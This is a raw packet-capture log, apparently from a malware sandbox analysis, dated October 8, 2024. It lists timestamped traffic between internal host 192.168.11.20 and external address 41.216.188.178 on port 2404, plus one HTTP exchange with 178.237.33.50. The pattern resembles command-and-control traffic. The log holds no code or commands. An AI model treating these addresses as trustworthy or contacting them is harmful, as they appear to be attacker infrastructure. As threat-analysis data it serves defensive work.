                                                                                                                                                                                  Oct 8, 2024 16:52:34.743082047 CEST24044973641.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:34.832093954 CEST24044973841.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:34.841129065 CEST24044973841.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:34.841471910 CEST497382404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:34.867578983 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:34.867834091 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:34.882332087 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:34.882397890 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:34.882474899 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:34.882540941 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:34.882576942 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:34.882577896 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:34.882771015 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:34.882853985 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.056570053 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.056670904 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.056796074 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.056916952 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.057044029 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.057096958 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.057158947 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.057158947 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.057301044 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.057322025 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.057353020 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.057543039 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.057600975 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.057610989 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.057640076 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.058121920 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.066242933 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.066565037 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.066596985 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.066615105 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.066652060 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.066947937 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.067118883 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.067125082 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.067404032 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.067573071 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.067843914 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.067853928 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.067862988 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.068197966 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.068243980 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.068294048 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.068463087 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.117651939 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.117917061 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.118084908 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.238915920 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.239077091 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.239146948 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.239334106 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.239343882 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.239392996 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.239464045 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.239531040 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.239686966 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.239705086 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.239753962 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.239773989 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.239825010 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.239888906 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.239953041 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.240015030 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.240037918 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.240078926 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.240128040 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.240159988 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.240221024 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.240242958 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.240314007 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.240377903 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.240442991 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.240492105 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.240555048 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.240612030 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.240619898 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.240612030 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.240686893 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.240751982 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.240798950 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.240917921 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.240917921 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.250329971 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.250411987 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.250586987 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.250695944 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.250943899 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.251087904 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.251142979 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.251194000 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.251395941 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.251395941 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.251549959 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.251766920 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.251867056 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.251950979 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.252420902 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.252500057 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.252549887 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.301563025 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.357489109 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.422394037 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.422486067 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.422729969 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.422822952 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.422899008 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.422950029 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.423007011 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.423064947 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.423110962 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.423151016 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.423211098 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.423290968 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.423302889 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.423357964 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.423413038 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.423472881 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.423532009 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.423578024 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.423635006 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.423702002 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.423702002 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.424561977 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.424649000 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.424706936 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.424766064 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.424776077 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.424855947 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.424933910 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.424947023 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.425056934 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.425105095 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.425206900 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.425285101 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.425373077 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.425450087 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.425510883 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.425554991 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.425614119 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.425621986 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.425689936 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.425745964 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.425781965 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.425828934 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.425885916 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.425940037 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.425950050 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.426018000 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.426074028 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.426119089 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.426126957 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.426126957 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.426208019 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.426215887 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.426281929 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.426337957 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.426402092 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.426456928 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.426553011 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.426553011 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.426645041 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.426702976 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.426759958 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.426808119 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.426949024 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.426949978 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.435127020 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.435204029 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.436055899 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.436129093 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.436785936 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.436861992 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.437099934 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.437369108 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.437444925 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.437496901 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.437555075 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.437601089 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.456073046 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.456231117 CEST497392404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.468350887 CEST8049740178.237.33.50192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.468633890 CEST4974080192.168.11.20178.237.33.50
                                                                                                                                                                                  Oct 8, 2024 16:52:35.541199923 CEST24044973941.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.605295897 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.605456114 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.605588913 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.605735064 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.605796099 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.605904102 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.605962038 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.606067896 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.606200933 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.606311083 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.606426001 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.606533051 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.606545925 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.606669903 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.606707096 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.606808901 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.606877089 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.606884956 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.606955051 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.607023001 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.607132912 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.607217073 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.607217073 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.607290983 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.607414007 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.607505083 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.607557058 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.607656956 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.607733011 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.607745886 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.607847929 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.607897997 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.607989073 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.608059883 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.608124018 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.608236074 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.608295918 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.608381033 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.608474016 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.608546972 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.608603001 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.608633995 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.608689070 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.608732939 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.608788967 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.608802080 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.608877897 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.608933926 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.608997107 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.609024048 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.609126091 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.609237909 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.609257936 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.609257936 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.609384060 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.609453917 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.609513044 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.609558105 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.609596968 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.609715939 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.609812021 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.609865904 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.609989882 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.610018969 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.610135078 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.610256910 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.610364914 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.610378981 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.610512018 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.610529900 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.610660076 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.610755920 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.610851049 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.610872030 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.611001015 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.611123085 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.611207962 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.611221075 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.611354113 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.611378908 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.611500025 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.611635923 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.611723900 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.611804962 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.611939907 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.611963987 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.612122059 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.612277985 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.612293005 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.612427950 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.612552881 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.612693071 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.612792015 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.612858057 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.612963915 CEST497372404192.168.11.2041.216.188.178
                                                                                                                                                                                  Oct 8, 2024 16:52:35.613038063 CEST24044973741.216.188.178192.168.11.20
                                                                                                                                                                                  Oct 8, 2024 16:52:35.613162041 CEST24044973741.216.188.178192.168.11.20
